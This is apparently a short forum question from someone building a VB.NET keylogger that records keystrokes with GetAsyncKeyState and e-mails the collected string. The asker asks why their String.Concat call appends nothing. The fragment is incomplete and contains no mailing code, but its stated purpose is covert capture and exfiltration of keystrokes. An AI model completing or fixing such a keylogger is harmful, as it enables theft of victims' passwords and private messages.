I declared a string s like this
Dim s As String=""
And I am trying to build a keylogger that e-mails String "s" by concatenating keystrokes. A sample code snippet is as follows
Dim hotkey5 As Boolean
hotkey5 = GetAsyncKeyState(Keys.E)
If hotkey5 = True Then
String.Concat(s, "E")
End If
But nothing is getting concatenated to String s. Why is that so?